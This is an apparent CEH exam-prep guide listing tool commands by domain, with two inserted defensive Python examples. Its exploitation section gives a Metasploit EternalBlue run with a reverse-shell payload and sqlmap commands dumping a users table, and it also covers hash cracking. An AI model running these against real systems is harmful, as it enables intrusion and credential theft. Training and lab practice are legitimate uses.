Intermediate · Exam Strategy · 8 min read

How to Pass the CEH (Certified Ethical Hacker) Exam

Master ethical hacking with real CLI tools and proven exam strategies.

The CEH (Certified Ethical Hacker) exam from EC-Council validates your ability to think like a hacker and identify vulnerabilities before malicious actors do. With 125 multiple-choice questions, a 4-hour time limit, and a passing score of 70%, this exam demands both theoretical knowledge and hands-on proficiency. You'll need to master tools like Nmap, Metasploit, Wireshark, and SQLmap, as well as understand footprinting, scanning, enumeration, system hacking, and social engineering. This guide provides a step-by-step study plan, real CLI commands, and insider tips to help you pass on your first attempt.

1. Understand the Exam Blueprint and Domains

Start by downloading the official CEH exam blueprint from EC-Council. The exam covers 20 domains, including footprinting (17%), scanning networks (17%), enumeration (14%), system hacking (14%), and malware threats (7%). Focus on high-weight domains first. The exam has 125 questions, and you need 70% to pass. Use the blueprint to create a study schedule that allocates more time to domains with higher percentages.

Exam Blueprint Summary
EC-Council CEH Exam Blueprint (v12)
Domain 1: Footprinting & Reconnaissance - 17%
Domain 2: Scanning Networks - 17%
Domain 3: Enumeration - 14%
Domain 4: System Hacking - 14%
Domain 5: Malware Threats - 7%
...
Total Questions: 125
Passing Score: 70%

Print the blueprint and check off each domain as you master it. Use a progress tracker to stay motivated.

Don't skip low-weight domains like IoT hacking (3%) — they can still cost you points.

2. Master Reconnaissance with Nmap and Recon-ng

Footprinting is the first phase of ethical hacking. Practice using Nmap for network scanning and Recon-ng for automated reconnaissance. Learn to identify open ports and running services, and to fingerprint the target's operating system. Use Nmap scripts to detect vulnerabilities. For example, run a SYN scan with service version detection and OS detection. Understand the difference between active and passive reconnaissance.

Bash / Recon-ng
nmap -sS -sV -O -T4 -p- 192.168.1.0/24
# SYN scan, version detection, OS detection, all ports

recon-ng
[recon-ng][default] > use recon/domains-hosts/google_site_web
[recon-ng][default] > set SOURCE example.com
[recon-ng][default] > run

Use the Nmap scripting engine (NSE) for vulnerability detection: nmap --script vuln <target>

Always get written permission before scanning any network you don't own.
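As an added example (not code from the original guide), here is a small Python parser for the grepable (-oG) output of a scan like the one above, plus an allow-list check that reports any port a lab host exposes beyond what you intended. The sample scan output, the host addresses and the allow-list are constructed for illustration.

```python
from collections import namedtuple

# One record per open port found in Nmap grepable (-oG) output.
Port = namedtuple("Port", "host port proto service version")

def parse_grepable(text: str):
    """Parse Nmap -oG output. Each 'Host:' line is tab-separated into 'Key: value'
    sections; the Ports section holds entries of the form
    port/state/proto/owner/service/rpcinfo/version/ separated by ', '."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # '# Nmap ...' comment lines carry no host data
        sections = dict(s.split(": ", 1) for s in line.split("\t") if ": " in s)
        host = sections["Host"].split()[0]
        for entry in sections.get("Ports", "").split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue  # 'Status: Up' lines have no Ports section
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            if state == "open":
                results.append(Port(host, int(port), proto, service, version))
    return results

def unexpected_exposure(ports, allowed):
    """Open ports missing from the per-host allow-list: the check you run against
    your own lab or asset inventory to confirm only intended services are reachable."""
    return [p for p in ports if p.port not in allowed.get(p.host, set())]

# Constructed sample in the -oG layout (not output from a real scan).
SAMPLE_OUTPUT = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//Apache httpd 2.4.52/, 445/open/tcp//microsoft-ds///, 3306/filtered/tcp//mysql///\tIgnored State: closed (65531)
Host: 192.168.1.20 ()\tPorts: 443/open/tcp//https//nginx 1.24.0/\tIgnored State: closed (65534)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# Constructed allow-list: what each lab host is supposed to expose.
ALLOWED = {"192.168.1.10": {22, 80}, "192.168.1.20": {443}}

if __name__ == "__main__":
    for p in unexpected_exposure(parse_grepable(SAMPLE_OUTPUT), ALLOWED):
        print(f"{p.host}:{p.port}/{p.proto} ({p.service} {p.version}) is not in the allow-list")
```

Running the block against real output from `nmap -oG scan.gnmap ...` only requires reading that file into `parse_grepable`.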

3. Perform Enumeration with NetBIOS, SNMP, and LDAP

Enumeration extracts user lists, shares, and services from target systems. Use tools like enum4linux for NetBIOS/SMB enumeration, snmpwalk for SNMP, and ldapsearch for Active Directory. Practice extracting usernames, group memberships, and system policies. This phase is critical for identifying attack vectors.

Bash
enum4linux -a 192.168.1.10
# Enumerate users, shares, OS info via SMB

snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.1
# Enumerate system information via SNMP

ldapsearch -x -H ldap://192.168.1.10 -b "dc=example,dc=com"
# Enumerate LDAP directory

Use the -a flag with enum4linux to get all available information in one go.

SNMP community strings like 'public' are often left default — this is a common exam scenario.

4. Exploit Vulnerabilities with Metasploit and SQLmap

System hacking involves gaining access. Use Metasploit to exploit known vulnerabilities and SQLmap to automate SQL injection attacks. Practice setting up a listener, selecting an exploit, and configuring payloads. For example, exploit EternalBlue on a Windows target or use SQLmap to dump a database. Understand how to escalate privileges and maintain access.

Metasploit / SQLmap
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.10
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > exploit

sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump

Use Metasploit's post-exploitation modules to gather credentials and pivot to other systems.

Metasploit exploits can crash services — test in a lab environment first.

5. Analyze Traffic with Wireshark and Tcpdump

Packet analysis is essential for detecting attacks and understanding network protocols. Use Wireshark to capture and filter traffic. Practice identifying ARP spoofing, SYN floods, and DNS queries. Use tcpdump for command-line packet capture. Learn to filter by IP, port, and protocol. Understand how to extract files from packet captures.

Bash / Wireshark
tcpdump -i eth0 -n -s 0 -w capture.pcap
# Capture all traffic on eth0

tcpdump -r capture.pcap 'tcp port 80'
# Filter HTTP traffic

Wireshark filter: http.request or tcp.port == 443
# Show HTTP requests and HTTPS traffic

Use Wireshark's 'Follow TCP Stream' feature to reconstruct conversations and extract data.

Large packet captures can consume memory — use capture filters to limit scope.
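An added example, not part of the original guide: a pure-Python libpcap reader that decodes Ethernet/ARP frames from a capture like the one tcpdump writes above and reports the ARP-spoofing indicator this step mentions, one IP address announced by two different MACs. The capture is constructed in code, with MAC addresses and 192.168.1.x hosts chosen for illustration.

```python
import struct
from collections import defaultdict

ETHERTYPE_ARP = 0x0806

def iter_frames(pcap: bytes):
    """Yield raw frames from a classic libpcap file (24-byte global header, then a 16-byte record header per frame)."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = "<" if magic == 0xA1B2C3D4 else ">"  # writer's byte order, taken from the magic number
    off = 24
    while off + 16 <= len(pcap):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len

def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/ARP frame, else None."""
    if len(frame) < 42 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_ARP:
        return None
    opcode = struct.unpack_from("!H", frame, 20)[0]  # ARP header starts at offset 14; opcode is its bytes 6-7
    return opcode, frame[22:28].hex(":"), ".".join(str(b) for b in frame[28:32])

def detect_arp_spoof(pcap: bytes):
    """Map each IP claimed in ARP replies to the MACs claiming it; an IP with more than one MAC is the classic poisoning indicator (Wireshark's 'Duplicate IP address detected' expert info)."""
    seen = defaultdict(set)
    for frame in iter_frames(pcap):
        arp = parse_arp(frame)
        if arp and arp[0] == 2:  # opcode 2 = ARP reply
            seen[arp[2]].add(arp[1])
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}

# --- constructed sample capture, built in code rather than taken from a real trace ---
def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    ip = lambda s: bytes(int(x) for x in s.split("."))
    eth = target_mac + sender_mac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)  # htype=Ethernet, ptype=IPv4, hlen=6, plen=4, oper=reply
    return eth + arp + sender_mac + ip(sender_ip) + target_mac + ip(target_ip)

def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # pcap v2.4, snaplen 65535, linktype 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f  # ts_sec, ts_usec, incl_len, orig_len
    return out

GATEWAY_MAC, ROGUE_MAC, VICTIM_MAC = (bytes.fromhex(h) for h in ("aabbccddee01", "aabbccddee99", "aabbccddee02"))
SAMPLE_PCAP = build_pcap([
    arp_reply(GATEWAY_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.10"),  # legitimate reply from the gateway
    arp_reply(ROGUE_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.10"),    # a second MAC claiming the gateway's IP
])
```

To run it over a real file, pass the bytes of a capture written with `tcpdump -w` (classic pcap, not pcapng) to `detect_arp_spoof`.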

6. Practice Social Engineering and Password Cracking

Social engineering is a key exam domain. Learn techniques like phishing, pretexting, and tailgating. For password cracking, use tools like John the Ripper and Hashcat. Practice cracking NTLM hashes and Linux shadow files. Understand password policies and how to create wordlists with Crunch.

Bash
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Crack NTLM hashes

hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Hashcat mode 1000 = NTLM

crunch 8 8 abcdef123 -o wordlist.txt
# Generate 8-character wordlist with custom charset

Use the rockyou.txt wordlist — it's included in Kali Linux and contains millions of real passwords.

Password cracking can be time-consuming — focus on weak passwords and common patterns.

7. Take Practice Exams and Review Weak Areas

After studying all domains, take full-length practice exams from reputable sources like Boson or EC-Council's official practice tests. Simulate the 4-hour time limit. Review every question you got wrong and understand the reasoning. Focus on areas where you score below 80%. Repeat until you consistently score 85% or higher.

Sample Results
Practice Exam Results:
Domain 1: 85%
Domain 2: 78% <- Weak area, review scanning techniques
Domain 3: 90%
Domain 4: 72% <- Weak area, review privilege escalation
Domain 5: 88%
Overall: 82%

Use the 'exam mode' in practice tests to build stamina and time management skills.

Don't memorize answers — understand the concepts. EC-Council changes questions frequently.

Key tips

  • Set up a home lab with VirtualBox or VMware. Install Kali Linux, Metasploitable, and Windows VMs to practice attacks in a safe environment.

  • Join the CEH subreddit and Discord communities. Discussing concepts with peers reinforces learning and exposes you to real-world scenarios.

  • Use flashcards for port numbers, tool commands, and attack types. Apps like Anki are great for spaced repetition.

  • Focus on the 'why' behind each attack. The exam tests your understanding of methodology, not just tool usage.

  • Take breaks during study sessions. The Pomodoro technique (25 min study, 5 min break) improves retention.

  • Book your exam date before you start studying. A deadline creates urgency and prevents procrastination.

Frequently asked questions

How many questions are on the CEH exam and what is the passing score?

The CEH exam has 125 multiple-choice questions. You have 4 hours to complete it, and the passing score is 70%. Some questions may be unscored (beta questions), but you won't know which ones. Aim for 85% on practice tests to be safe.

Do I need to take an official EC-Council training course to sit for the exam?

EC-Council requires either official training (through an accredited partner) or at least 2 years of information security experience. If you have the experience, you can apply for the exam without training. Otherwise, you must complete a 5-day official CEH course.

What tools should I be proficient in for the CEH exam?

You should be comfortable with Nmap, Wireshark, Metasploit, SQLmap, John the Ripper, Hashcat, Burp Suite, and Recon-ng. The exam tests both theoretical knowledge and practical usage. Practice each tool in a lab environment until you can use them without referring to documentation.

How long does it take to prepare for the CEH exam?

Most candidates need 2-3 months of consistent study, dedicating 10-15 hours per week. If you have prior networking or security experience, you may need less time. Focus on hands-on labs and practice exams rather than just reading books.

Is the CEH exam worth it for my career?

Yes, especially if you're pursuing a career in penetration testing, security analysis, or red teaming. CEH is recognized by the DoD (8570 directive) and many employers. It demonstrates a structured understanding of ethical hacking methodology. However, consider pairing it with OSCP for advanced roles.
